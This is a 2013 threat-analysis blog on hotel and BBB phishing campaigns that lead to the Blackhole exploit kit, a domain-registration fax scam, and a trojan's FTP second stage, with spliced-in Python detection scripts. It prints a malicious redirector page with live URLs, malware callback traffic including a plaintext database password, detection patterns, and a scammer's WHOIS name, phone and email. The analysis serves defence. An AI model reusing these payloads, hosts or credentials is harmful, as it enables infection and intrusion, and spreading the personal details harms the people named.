Wednesday, June 19, 2013

Hotel Registration Phishing Campaign with AutoClerk(?)

This particular campaign is using the "shock and awe" billing technique to create urgency. This campaign is using predictable Blackhole techniques.
Also spotted on DSL Reports


Subject:   Your reservation at HOTEL UNION SQUARE
From:   "Reservations" <reservations@m.personalityhotelsmail.net>
Date:   Wed, June 19, 2013 12:39 pm
Priority:   Normal

Header information:
X-Mailer: AutoClerk <--- Whoa. Stop.
Let's dive
http://www.autoclerk.com/news/autoclerk-introduces-emarketing-to-its-suite-of-products-and-services
Autoclerk is a property management system that provides eMarketing to Hotels.
http://www.autoclerk.com/hotel-emarketing

^^

Content-Type: multipart/alternative; <-- Plain text and html elements k.
X-Spam-Status: No, score=5.8 <--- Not close enough.



Sent to you from Copenhagen, because clearly that's where Hotel Union Square is... not.






The payload uses a refresh method to immediately redirect you. Nothing new but we can still use this for more information.

(html>(CR)(LF)
(title>HOTEL·UNION·SQUARE·is·loading...(/title>(CR)(LF)
(script·type="text/javascript">(CR)(LF)
(!--(CR)(LF)
location.replace("http://winne2000.net/news/enough-advise.php");(CR)(LF)
//-->(CR)(LF)
(/script>(CR)(LF)
(noscript>(CR)(LF)
(meta·http-equiv="refresh"·content="0;·url=http://winne2000.net/news/enough-advise.php">(CR)(LF)
(/noscript>(CR)(LF)
(CR)(LF)
(/head>(CR)(LF)
(CR)(LF)
(h1>You·will·be·redirected·to·process(/h1>(CR)(LF)
(CR)(LF)
(CR)(LF)
(h4·style="color:#364dbc;">We·must·complete·few·security·checks·to·show·your·transfer·details:(/h4>(CR)(LF)
(CR)(LF)
(h3>Be·sure·you·have·a·transfer·reference·ID.(br·/>You·will·be·asked·to·enter·it·after·we·check·the·link.(br>(br>Important:·Please·be·advised·that·calls·to·and·from·your·wire·service·team·may·be·monitored·or·recorded.(br·/>(/h3>(CR)(LF)
(CR)(LF)
(h3>Redirecting·to·Complain·details...·Please·wait...(/h3>(CR)(LF)

And the payload begins with

<style>b,div{color:#fff;}</style><script>function vq(){s="";zzz();az=21;try{caewbtew=~312;}catch(vava){az=0;}

Let's go deeper


The caewbtew=~ string at the entry point is consistent with the FedEx, American Airlines, DHL, and PayPal campaigns, with some obfuscation techniques that follow. Oh yes, also the BBB Campaign I looked at here. There are two observed variants, one with catch(vava) and one with catch(qw). This is some lovely stuff when coupled with some other indicators and I've used it very successfully in the past.

This string has also been spotted in other compromised WordPress sites, about 860 indexed in Google.


Which also contained the string:
Redirecting to Complain details... Please wait...

Something like 860 hits. Same as the BBB Campaign.
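The two artifacts above, the compromised-site redirector page (JavaScript location.replace() plus a noscript meta refresh to the same URL, and the "Redirecting to Complain details" text) and the obfuscated-JS entry string with its catch(vava)/catch(qw) variants, are easy to turn into a page scanner. The following is an added example and not code from the post; the sample pages are constructed here and the landing URL is a placeholder.

```python
import re

# Indicators from the redirector and landing pages quoted in this post:
# an immediate location.replace(), a <noscript> meta-refresh fallback to the
# same URL, the "Redirecting to Complain details" text, and the obfuscated-JS
# entry string with the two observed catch() variable names.
REDIRECT_JS = re.compile(r'location\.replace\(\s*["\']([^"\']+)["\']\s*\)', re.I)
META_REFRESH = re.compile(
    r'<meta[^>]*http-equiv=["\']?refresh["\']?[^>]*content=["\']\s*0\s*;\s*url=([^"\'>\s]+)',
    re.I)
COMPLAIN_TEXT = re.compile(r'Redirecting\s+to\s+Complain\s+details', re.I)
ENTRY_STRING = re.compile(r'try\{[a-z]+=~\d+;\}catch\((vava|qw)\)', re.I)


def scan_page(html):
    """Collect redirector / landing-page indicators from one HTML document."""
    findings = {}
    m = REDIRECT_JS.search(html)
    if m:
        findings["js_redirect"] = m.group(1)
    m = META_REFRESH.search(html)
    if m:
        findings["meta_refresh"] = m.group(1)
    if COMPLAIN_TEXT.search(html):
        findings["complain_text"] = True
    m = ENTRY_STRING.search(html)
    if m:
        findings["entry_catch_variant"] = m.group(1).lower()
    return findings


def classify(findings):
    """Verdict: the entry string alone identifies the landing page; for the
    redirector, JS plus a matching meta refresh is the core, the text string
    raises confidence."""
    if "entry_catch_variant" in findings:
        return "landing-page"
    score = 0
    if "js_redirect" in findings:
        score += 2
    if "meta_refresh" in findings:
        score += 2
    if findings.get("js_redirect") and findings.get("js_redirect") == findings.get("meta_refresh"):
        score += 1
    if findings.get("complain_text"):
        score += 1
    if score >= 4:
        return "redirector"
    if score >= 2:
        return "suspicious"
    return "clean"


# Constructed sample mirroring the quoted redirector layout; placeholder URL.
REDIRECTOR_PAGE = """<html>
<title>HOTEL UNION SQUARE is loading...</title>
<script type="text/javascript">
<!--
location.replace("http://landing.example.invalid/news/enough-advise.php");
//-->
</script>
<noscript>
<meta http-equiv="refresh" content="0; url=http://landing.example.invalid/news/enough-advise.php">
</noscript>
</head>
<h1>You will be redirected to process</h1>
<h3>Redirecting to Complain details... Please wait...</h3>
"""

# Constructed sample of the landing page's first bytes (entry string only).
LANDING_PAGE = ('<style>b,div{color:#fff;}</style><script>function vq(){s="";zzz();'
                'az=21;try{caewbtew=~312;}catch(vava){az=0;}')

CLEAN_PAGE = "<html><head><title>Hotel</title></head><body><p>Welcome</p></body></html>"

if __name__ == "__main__":
    for name, page in [("redirector", REDIRECTOR_PAGE), ("landing", LANDING_PAGE), ("clean", CLEAN_PAGE)]:
        f = scan_page(page)
        print(name, classify(f), f)
```

Pointing scan_page() at the HTML of each site in the Google hits gives a quick triage list; the js/meta URL pair also hands you the next hop to block.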

Proving once again that nothing beats a human security analyst:


I'm not going to rehash blackhole here. We know what's up. Evidence of a broader campaign below.



References:

Friday, June 7, 2013

BBB Phish Event - Blackhole - ZeroAccess

EMAIL

The Better Business Bureau has been filed the above mentioned reclamation from one of your clients in respect of their dealings with you. The detailed description of the consumer's anxiety are available by clicking the link below. Please give attention to this issue and notify us about your mind as soon as possible.

We politely ask you to overview the <LINK>GRIEVANCE REPORT<LINK> to meet on this complaint.

We are looking forward to your prompt response.

Best regards
Tristan Lewis
Dispute Councilor
Better Business Bureau

==============HTML====================

GET /bbb.html HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: 
Host: speedgarage.com.ua
Connection: Keep-Alive

HTTP/1.0 200 OK
Server: nginx/1.1.10
Date: Fri, 07 Jun 2013 17:13:03 GMT
Content-Type: text/html
Content-Length: 738
Last-Modified: Fri, 07 Jun 2013 11:53:09 GMT
Accept-Ranges: bytes
Connection: keep-alive


(html>
(title>BBB is loading...(/title>
(script type="text/javascript">
(!--location.replace("http://pnpnews.net/news/readers-sections.php");
//-->
(/script>
(noscript>
(meta http-equiv="refresh" content="0; url=http://pnpnews.net/news/readers-sections.php">
(/noscript>
(/head>
(h1>You will be redirected to process(/h1>
(h3>Redirecting to Complain details... Please wait...(/h3>

location.replace("http://pnpnews.net/news/readers-sections.php");
"refresh" content="0; url=http://pnpnews.net/news/readers-sections.php




Payload: pnpnews.net

Exploit Kit: Blackhole

Snort Rules 

ET TROJAN Spoofed MSIE 7 User-Agent Likely Ponmocup
ET CURRENT_EVENTS SUSPICIOUS JAR Download by Java UA with non JAR EXT matches various EKs
ET INFO Packed Executable Download
ET CURRENT_EVENTS Blackhole request for Payload
ET CURRENT_EVENTS BlackHole EK JNLP request
ET CURRENT_EVENTS - Possible BlackHole request with decryption Base
ET TROJAN Pony Downloader check-in response STATUS-IMPORT-OK
ET TROJAN Known Trojan Downloader HTTP Library MSIE 5 Win98 seen with ZeuS
ET TROJAN Fareit/Pony Downloader Checkin 2
ET CURRENT_EVENTS DRIVEBY Blackhole - Payload Download - readme.exe
ET CURRENT_EVENTS DRIVEBY Blackhole - Payload Download - contacts.exe
ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (6)
ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (5)
ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (41)
ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (33)
ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (13)

Drop Points: 
88.191.130.98:8080

  • 8080/tcp open  http    nginx 1.0.10
  • 21/tcp   open     ftp          Pure-FTPd
  • 22/tcp   open     ssh          OpenSSH 5.3p1 Debian 3ubuntu7 (protocol 2.0)
  • 25/tcp   open     smtp         Postfix smtpd
  • 80/tcp   open     http         Apache httpd 2.2.14 ((Ubuntu))
  • 8080/tcp open     http         nginx 1.0.10
  • 8090/tcp open     http         nginx 1.2.6

213.214.74.5:8080 

  • 8080/tcp open  http         nginx 1.0.10
  • 21/tcp   open     ftp          ProFTPD 1.3.3d
  • 22/tcp   open     ssh          OpenSSH 5.8p1 Debian 1ubuntu3 (protocol 2.0)
  • 80/tcp   open     http         Apache httpd 2.2.17 ((Ubuntu))


      Disk Artifacts of Interest: 

      exp1.tmp.exe | VirusTotal Detected as: PSW.Generic | Fareit | Zero Access 30/47
      exp1.tmp
      exp2.tmp


      URLs Involved
      hxxp://carpenterpricebreaker.com/bbb.html
      hxxp://ecotopia.pl/bbb.html
      hxxp://gite-cantal-meandres.fr/bbb.html
      hxxp://ib-greb.de/bbb.html
      hxxp://intelaboratory.com/bbb.html
      hxxp://rentbaku.com/bbb.html
      hxxp://slavamoskovkin.ru/bbb.html
      hxxp://speedgarage.com.ua/bbb.html
      hxxp://vmoskalev.ru/bbb.html



      Sunday, April 28, 2013

      Let's Deep Dive a Domain Registration Scam Email

      Having an internet presence for so long, I have seen many of these.

      These emails are using the BMX Mailer, with a Precedence field and online virtual fax numbers, and have some ties to a Romanian web server. The goal is to switch you to their "domain registration" service for an affordable $75/year lol.

      You only have to fax them a credit card form.

      Here's a copy of the email:


      Sent from a hotmail address, so clearly legitimate


      It is important to note that the message guarantees 100% satisfaction.




      So this hostname, email2u.us comes back to a Romanian registration. Probably nothing suspicious here #scoff




      Return-path: <domainservicb73@hotmail.com>
      Envelope-to: receiver@domain.com
      Delivery-date: Sat, 27 Apr 2013 18:54:15 -0500
      Received: from [184.82.95.130] (port=41871 helo=host.kevinz.com)
           by hosteddomain.com with esmtps (TLSv1:DHE-RSA-AES256-SHA:256)
           (Exim 4.80)
           (envelope-from <domainservicb73@hotmail.com>)
           id 1UWEwY-0001rX-K2
           for receiver@domain.com; Sat, 27 Apr 2013 18:54:15 -0500
      Received: from domainin by host.kevinz.com with local (Exim 4.80)
           (envelope-from <domainservicb73@hotmail.com>)
           id 1UWEwN-000189-VO
           for receiver@domain.com; Sat, 27 Apr 2013 19:54:04 -0400
      To: receiver@domain.com
      Subject: Domain Notification: JOE CITIZEN This is your Final Notice of Domain Listing - domain.com

      X-PHP-Script: 184.82.95.130/~domainin/info/mail_new2.php for 99.247.101.189 

      (the PHP script seems to be common in these messages and the 99. address is a Canadian address)

      From: Domain Services <domainservicb73@hotmail.com>
      MIME-Version: 1.0
      Content-Type: text/html;

      X-Mailer: AT (undocumented X-mailer, seems to be a common string in these messages, see References)

      Priority: High
      Importance: High

      Precedence: VBBV (not a generally used value; see This and RFC 2076. The Precedence in these messages always appears to be a four-letter upper-case code, which might be a useful indicator for spam blockers to check for)

      Message-Id: <E1UWEwN-000189-VO@host.kevinz.com>
      Date: Sat, 27 Apr 2013 19:54:03 -0400
      X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
      X-AntiAbuse: Primary Hostname - host.kevinz.com
      X-AntiAbuse: Original Domain - domain.com
      X-AntiAbuse: Originator/Caller UID/GID - [500 501] / [47 12]
      X-AntiAbuse: Sender Address Domain - hotmail.com
      X-Get-Message-Sender-Via: host.kevinz.com: authenticated_id: domainin/only user confirmed/virtual account not confirmed
      X-Spam-Status: No, score=5.2
      X-Spam-Score: 52
      X-Spam-Bar: +++++
      X-Spam-Flag: NO


      Common Strings:


      • X-Mailer: AT
      • Precedence: (followed by a 4 Upper Case Letter Code)
      • /~domainin/info/mail_new2.php for <ip address>
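The common strings above, plus the sender mismatch visible in the headers (a hotmail.com Return-Path on a message injected locally by the "domainin" account), can be applied to a raw message with the standard library. This is an added example and not the post's code; the sample headers are constructed from the fields quoted above with placeholder addresses, hostnames and documentation-range IPs.

```python
import re
from email import message_from_string

# Indicators from the headers quoted in this post.  Precedence normally
# carries values like bulk, list, junk or first-class; the scam mailer uses
# a random four-letter upper-case code instead.
KNOWN_PRECEDENCE = {"bulk", "junk", "list", "first-class"}
FOUR_UPPER = re.compile(r"^[A-Z]{4}$")
PHP_SCRIPT = re.compile(
    r"(\d{1,3}(?:\.\d{1,3}){3})/~domainin/info/mail_new2\.php for (\d{1,3}(?:\.\d{1,3}){3})")
FINAL_NOTICE = re.compile(r"This is your Final Notice of Domain Listing")
FREEMAIL_DOMAINS = {"hotmail.com", "yahoo.com", "ymail.com", "gmail.com"}


def header_indicators(raw_message):
    """Return the list of indicator names that fire on one raw RFC 822 message."""
    msg = message_from_string(raw_message)
    hits = []

    if (msg.get("X-Mailer") or "").strip() == "AT":
        hits.append("x-mailer:AT")

    precedence = (msg.get("Precedence") or "").strip()
    if precedence and precedence.lower() not in KNOWN_PRECEDENCE and FOUR_UPPER.match(precedence):
        hits.append("precedence:" + precedence)

    m = PHP_SCRIPT.search(msg.get("X-PHP-Script") or "")
    if m:
        hits.append("php-script:%s->%s" % (m.group(1), m.group(2)))

    if FINAL_NOTICE.search(msg.get("Subject") or ""):
        hits.append("subject:final-notice-template")

    # A freemail Return-Path on a message the relay says was injected by a
    # local authenticated account is the mailer's signature, not a forward.
    via = msg.get("X-Get-Message-Sender-Via") or ""
    account = re.search(r"authenticated_id:\s*([^/\s]+)", via)
    sender = (msg.get("Return-Path") or "").strip("<> ")
    sender_domain = sender.rsplit("@", 1)[-1].lower()
    if account and sender_domain in FREEMAIL_DOMAINS:
        hits.append("local-injection:%s<-%s" % (account.group(1), sender_domain))

    return hits


# Constructed sample built from the quoted fields; placeholders throughout.
SCAM_HEADERS = """Return-Path: <domainservice@hotmail.com>
Received: from [192.0.2.10] (helo=host.mailer.example) by mx.example.net (Exim 4.80)
To: receiver@example.net
Subject: Domain Notification: JOE CITIZEN This is your Final Notice of Domain Listing - example.net
X-PHP-Script: 192.0.2.10/~domainin/info/mail_new2.php for 198.51.100.7
From: Domain Services <domainservice@hotmail.com>
MIME-Version: 1.0
X-Mailer: AT
Priority: High
Importance: High
Precedence: VBBV
X-Get-Message-Sender-Via: host.mailer.example: authenticated_id: domainin/only user confirmed/virtual account not confirmed

<html>placeholder body</html>
"""

# Constructed ordinary message for comparison.
NORMAL_HEADERS = """Return-Path: <alice@example.org>
From: Alice <alice@example.org>
To: receiver@example.net
Subject: Invoice for April
X-Mailer: Mozilla Thunderbird
Precedence: bulk
MIME-Version: 1.0

Hi
"""

if __name__ == "__main__":
    print(header_indicators(SCAM_HEADERS))
    print(header_indicators(NORMAL_HEADERS))
```

Any two of these together are enough to quarantine; the X-PHP-Script path alone also tells you which cPanel account on which host to report.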

      Some digging around revealed some leaked information on the server, which is publicly accessible. This is a list of the "csv" files which have been uploaded to the server.


      Information Leakage in HTML Files:


      A host of csv files are leaked and identified on this server, including the following:


      30mil_com-6-23.csv   
      30mil_com-6-24.csv   
      30mil_com-6-25.csv   
      30mil_com-6-26.csv   
      30mil_com-6-27.csv   
      30mil_com-6-28.csv   
      30mil_com-6-29.csv   
      30mil_com-6-30.csv   
      30mil_com-6-31.csv   
      30mil_com-6-32.csv   
      30mil_com-6-33.csv
      
      
      
      
      and there are a bunch more files like this. Nothing beats having 30 million+ emails to choose from.

      184.82.95.130 Services

      PORT     STATE  SERVICE VERSION
      53/tcp   open   domain  ISC BIND 9.3.6-20.P1.el5_8.6
      1723/tcp closed pptp
      Device type: general purpose|firewall|proxy server|WAP


      FYI: http://www.cvedetails.com/vulnerability-list/vendor_id-64/product_id-144/version_id-21860/ISC-Bind-9.3.0.html

      Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at 184.82.95.130 Port 80


      Information Leakage in Error Message:

      [LF]
      <h1>404 Not Found</h1>[LF]
      
          Please forward this error screen to 184.82.95.130's [LF]
          <a href="mailto:kevinz50@ymail.com
          WebMaster</a>.[LF]
      </p>[LF]


      Centralops on email2u.us


      Domain Name:                                 EMAIL2U.US
      Domain ID:                                   D35316435-US
      Sponsoring Registrar:                        ENOM, INC.
      Sponsoring Registrar IANA ID:                48
      Registrar URL (registration services):       whois.enom.com
      Domain Status:                               clientTransferProhibited
      Registrant ID:                               62EA327952C1BCAB
      Registrant Name:                             Andrei  Manoliu
      Registrant Address1:                         atelierele noi
      Registrant City:                             bucharest
      Registrant State/Province:                   bucuresti
      Registrant Postal Code:                      014571
      Registrant Country:                          Romania
      Registrant Country Code:                     RO
      Registrant Phone Number:                     +40.767801428
      Registrant Email:                            slabeste2011@yahoo.com
      Registrant Application Purpose:              P1
      Registrant Nexus Category:                   C12
      Administrative Contact ID:                   EDAECA2EE634C95B
      Administrative Contact Name:                 Andrei  Manoliu
      Administrative Contact Address1:             atelierele noi
      Administrative Contact City:                 bucharest
      Administrative Contact State/Province:       bucuresti
      Administrative Contact Postal Code:          014571
      Administrative Contact Country:              Romania
      Administrative Contact Country Code:         RO
      Administrative Contact Phone Number:         +40.767801428
      Administrative Contact Email:                slabeste2011@yahoo.com


      BMX Mailer



      <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">[CRLF]
      [CRLF]
      <html>[CRLF]
      <head>[CRLF]
      <title>BMX : Bulk Mailer</title>[CRLF]
      </head>[CRLF]
      [CRLF]
      <body>[CRLF]
      [CRLF]
      <form name="mail" method="post" action="mail_new2.php">[CRLF]
      [CRLF]
        <table width="60%" border="0" cellspacing="1" cellpadding="1" align="center" bgcolor=#DCDCDC>[CRLF]
      <tr><td colspan=2><font face=arial size=2><strong>Bulk Mailer</strong></font></td></tr>[CRLF]
          <tr> [CRLF]
            <td align="right"><font face="Arial, Helvetica, sans-serif" size="2">Subject:</font></td>[CRLF]
            <td> [CRLF]
              <select size="1" name="subjectid" style="width:250">[CRLF]
      <option value="">-- Select -- [CRLF]
      <option value=1>Domain Notification: {NAME} This is your Final Notice of Domain Listing - {WEBURL}</select>[CRLF]
            </td>[CRLF]
          </tr>[CRLF]
      <tr>[CRLF]
      <td align=right><font face=arial size=2>Select Group:</font></td>[CRLF]
      <td>[CRLF]
      <select name="groupid">[CRLF]
      <option value=0>-- Select --[CRLF]
      <option value=1>Domain Services</select>[CRLF]
      </td>[CRLF]

      Others have gotten this and posted their headers. 



      From - Fri Mar 22 17:28:39 2013
      X-Account-Key: account2
      X-UIDL: 12219
      X-Mozilla-Status: 0001
      X-Mozilla-Status2: 00010000
      X-Mozilla-Keys:
      Return-Path: domainserhhjcb73@hotmail.com
      Received: from spoolbl10-d.mail.gandi.net ([217.70.178.90])
      by mail.brakstar.com
      ; Fri, 22 Mar 2013 17:24:00 +0100
      Received: from mxcontact.gandi.net (mxcontact.gandi.net [217.70.177.36])
      by spoolbl10-d.mail.gandi.net (Postfix) with ESMTP id 0D8E795AE38
      for <societe@brakstar.com>; Fri, 22 Mar 2013 17:23:55 +0100 (CET)
      Received: from server1.ryansheppard.com (unknown [209.198.1.90])
      by mredir1-v.mgt.gandi.net (Postfix) with ESMTP id 4544EEC40A
      for <8493FD79D2F73DED5468744CAF859FE6-763727@CONTACT.GANDI.NET>; Fri, 22 Mar 2013 17:23:55 +0100 (CET)
      Received: from domainin by server1.ryansheppard.com with local (Exim 4.80)
      (envelope-from <domainserhhjcb73@hotmail.com>)
      id 1UIy2y-00032y-JH
      for 8493FD79D2F73DED5468744CAF859FE6-763727@CONTACT.GANDI.NET; Fri, 22 Mar 2013 05:14:00 -0400
      To: 8493FD79D2F73DED5468744CAF859FE6-763727@CONTACT.GANDI.NET
      Subject: Domain Notification: SARL BRAKSTAR This is your Final Notice of Domain Listing - RATONIA.COM

      X-PHP-Script: 209.198.1.90/~domainin/info/mail_new2.php for 99.237.121.36 (Again Canadian IP Address)

      From: Domain Services <domainserhhjcb73@hotmail.com>
      MIME-Version: 1.0
      Content-Type: text/html;

      X-Mailer: AT

      Priority: High
      Importance: High

      Precedence: SSWD

      Message-Id: <E1UIy2y-00032y-JH@server1.ryansheppard.com>
      Date: Fri, 22 Mar 2013 05:14:00 -0400
      X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
      X-AntiAbuse: Primary Hostname - server1.ryansheppard.com
      X-AntiAbuse: Original Domain - contact.gandi.net
      X-AntiAbuse: Originator/Caller UID/GID - [500 501] / [47 12]
      X-AntiAbuse: Sender Address Domain - hotmail.com
      X-Get-Message-Sender-Via: server1.ryansheppard.com: authenticated_id: domainin/only user confirmed/virtual account not confirmed
      X-Antivirus: avast! (VPS 130322-0, 22/03/2013), Inbound message
      X-Antivir



      References:
      http://www.spamreg.com/reg495597.htm
      http://www.ip-adress.com/whois/kevinz.com
      http://www.holmpage.com/2011/10/spam-alert-domain-notification-this-is-your-final-notice-of-domain-listing/
      http://www.webx.net/bmx/
      http://www.brakstar.com/forum/braktopic_22844.html
      http://www.elvey.com/spam/Domain_Services.html

      Sunday, April 21, 2013

      FTP JPG EXE as a Second Stage

      Something somewhat interesting. Blackhole exploit at


       GET /forum/links/public_version.php?yf=30:31:32:2v:1f&qe=2v:1k:1m:32:33:1k:1k:31:1j:1o&u=1f&hs=w&yy=e&jopa=6797956 HTTP/1.1
      User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_29
      Host: jindalo.ru:8080
      Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
      Connection: keep-alive
      
      
      
      
      SHA256:5f22da4c9ace64d97bc5d3107eaaca8cf1b88da61bd173996f839e88222f4257
      File name:blackhole.exe
      Detection ratio:1 / 46
      Analysis date:2013-04-21 21:37:27 UTC ( 0 minutes ago )
      https://www.virustotal.com/en/file/5f22da4c9ace64d97bc5d3107eaaca8cf1b88da61bd173996f839e88222f4257/analysis/1366580247/
      
      
      Ok, nothing new here. Whatever. Thanks for exploiting my Java. Strings output is all garbage, PEiD balked.
      
      
      1,400+ UDP packets to port 16471, à la ZeroAccess, in about 20 minutes, and an interesting one on port 55755.
      
      
      
      
       GET /app/geoip.js HTTP/1.0
      Host: j.maxmind.com
      Connection: close
      
      
      Ok, nothing new here. I'm located in Boca Raton playing golf with Tiger Woods, how did you guess?
      
      
      __________________________________________
      
      
      POST /10qVeAAAA/ebH7oAAAAA/rDhlJAA/ HTTP/1.1
      Accept: */*
      User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
      Host: 88.191.130.98:8080
      Content-Length: 339
      Connection: Keep-Alive
      Cache-Control: no-cache
      
      
      
      IP Seen on URL Query: http://urlquery.net/report.php?id=1768644
      
      
      __________________________________________
      
      
      POST /asp/intro.php HTTP/1.0
      Host: 111.68.142.223
      Accept: */*
      Accept-Encoding: identity, *;q=0
      Content-Length: 269
      Connection: close
      Content-Type: application/octet-stream
      Content-Encoding: binary
      User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
      
      
      User agent is a big indicator here. Somewhat interesting, documented by #MalwareMustDie http://malwaremustdie.blogspot.com/2012/12/the-crime-still-goes-on-trojan-parfeit.html
      
      
      Consistent with Trojan Fareit callbacks <Hat Tip MalwareMustDie>, but no botid url following this.
      __________________________________________
      
      
      This one looks interesting. Using Bit.ly, but a 301 to Google put the kibosh on this one.
      
      
      POST /YddCcn? HTTP/1.1
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 121
      Accept: */*
      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
      Host: bit.ly
      Connection: Keep-Alive
      
      op=IncluirAvisos&HostBD=dbmy0060%2Ewhservidor%2Ecom&SenhaBD=delphi2020&UsuarioBD=
      turckatty_2&DatabaseBD=turckatty_2&sgdb=
      
      
      Well the user agent is known badness: here and here dating back to 2010.
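The requests in this post are a good illustration of how far the User-Agent and request shape alone get you: the Java UA pulling a .php from port 8080 (the Blackhole JAR hand-off), the MSIE 5.0 / Windows 98 string on a binary POST to a bare IP (Fareit), and the WinHttpRequest.5 string posting database credentials. The following is an added example, not code from the post; the requests are constructed to mirror the ones above with placeholder hosts and credentials, and the rule reasons quote the Snort rule names listed earlier.

```python
import re

# Exact User-Agent strings from the requests in this post and the reason for
# treating them as malicious (the cited Snort rule names in quotes).
BAD_USER_AGENTS = {
    "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)":
        "Fareit/Pony check-in UA ('Known Trojan Downloader HTTP Library MSIE 5 Win98')",
    "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)":
        "WinHttpRequest UA, known badness since 2010",
}
JAVA_UA = re.compile(r"\bJava/\d+\.\d+\.\d+_\d+\b")
BARE_IP = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")


def parse_request(raw):
    """Split a raw HTTP request into request line, lower-cased headers and body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.strip("\n").split("\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version,
            "headers": headers, "body": body}


def assess(req):
    """Return the reasons this request looks like exploit-kit or bot traffic."""
    reasons = []
    h = req["headers"]
    ua = h.get("user-agent", "")
    host = h.get("host", "")

    if ua in BAD_USER_AGENTS:
        reasons.append("known-bad UA: " + BAD_USER_AGENTS[ua])

    # Java plugin fetching a .php on a non-standard port: Blackhole serving
    # the JAR ('SUSPICIOUS JAR Download by Java UA with non JAR EXT').
    port = host.rsplit(":", 1)[1] if ":" in host else ""
    if JAVA_UA.search(ua) and ".php" in req["path"] and port not in ("", "80", "443"):
        reasons.append("Java UA requesting .php on port " + port)

    # Raw binary POST straight to an IP address: the Fareit callback shape.
    if (req["method"] == "POST" and h.get("content-type") == "application/octet-stream"
            and BARE_IP.match(host)):
        reasons.append("binary POST to bare IP host " + host)

    # Database host/password fields leaving the machine in a form body.
    if req["method"] == "POST" and "HostBD=" in req["body"] and "SenhaBD=" in req["body"]:
        reasons.append("database credentials posted to " + host)

    return reasons


# Constructed samples mirroring the post's requests (placeholder hosts/values).
SAMPLES = {
    "blackhole": ("GET /forum/links/public_version.php?yf=30:31&jopa=1 HTTP/1.1\r\n"
                  "User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_29\r\n"
                  "Host: ek.example.invalid:8080\r\nConnection: keep-alive\r\n\r\n"),
    "fareit": ("POST /asp/intro.php HTTP/1.0\r\nHost: 192.0.2.23\r\nAccept: */*\r\n"
               "Content-Type: application/octet-stream\r\nContent-Encoding: binary\r\n"
               "User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)\r\n\r\n"),
    "winhttp": ("POST /YddCcn? HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\n"
                "User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\r\n"
                "Host: bit.ly\r\n\r\n"
                "op=IncluirAvisos&HostBD=db.example.invalid&SenhaBD=placeholder&UsuarioBD=u"),
    "browser": ("GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
                "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:20.0) Gecko/20100101 Firefox/20.0\r\n\r\n"),
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, assess(parse_request(raw)))
```

Feed it the request heads out of a pcap or proxy log and the empty-list cases drop away; everything else is worth a look at the host that sent it.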
      
      
      
      
       GET /WggQJ3RVGrKgdj0xLjImaWQ9NDIzODYxMDcxNiZhaWQ9MzA1NjImc2lkPTAmb3M9NS4xLTMyGuzZ
      0s7u HTTP/1.0
      Host: xlotxdxtorwfmvuzfuvtspel.com
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
      Accept-Language: en-us
      Connection: close
      
      
      I surmise this is a check in because I get a 200 OK but the content is empty - just a speculation.  Site Sinkholed.
      
      
      
      
      Ok, now for some FTP. The malware calls out to an FTP server with user name and password in clear text (most appreciated).
      
      
      220 Microsoft FTP Service
      
      USER <redacted>
      
      331 Password required for <redacted>.
       
      PASS <redacted>
      
      230 User logged in.
      
      215 Windows_NT
      
      CWD /dados/maxo4/
      
      250 CWD command successful.
       
      PASV
      227 Entering Passive Mode (<redacted>).
      RETR E174D3044694.jpg
      
      550 The system cannot find the file specified. 
      
      This thing tried multiple jpg files, none of which could be found. Well, I'm not going to let that one go by. Piqued my interest. I go digging and I find a root directory


      
      Interesting, so I download the jpgs that are there. 
      
      
      
      
      
      
      
      
      The worm is a variant on DelfInject.
      
      
      MZP   ÿÿ¸@  º   ´ Í!¸ LÍ!This program must be run under Win32 $
      
      
      
      
      Dumping the strings:
      
      
      DVCLAL
      PACKAGEINFO
      PORCOS
      TDTCONFIG
      TFORM1
      TFRMDATETIME
      xn7
      CPlApplet
      kernel32.dll
      LoadLibraryA
      GetProcAddress
      VirtualAlloc
      VirtualFree
      oleaut32.dll
      SysFreeString
      advapi32.dll
      RegQueryValueExW
      user32.dll
      LoadStringW
      msimg32.dll
      AlphaBlend
      gdi32.dll
      UnrealizeObject
      version.dll
      VerQueryValueW
      ole32.dll
      OleUninitialize
      comctl32.dll
      InitializeFlatSB
      winspool.drv
      OpenPrinterW
      ntdll
      NtUnmapViewOfSection
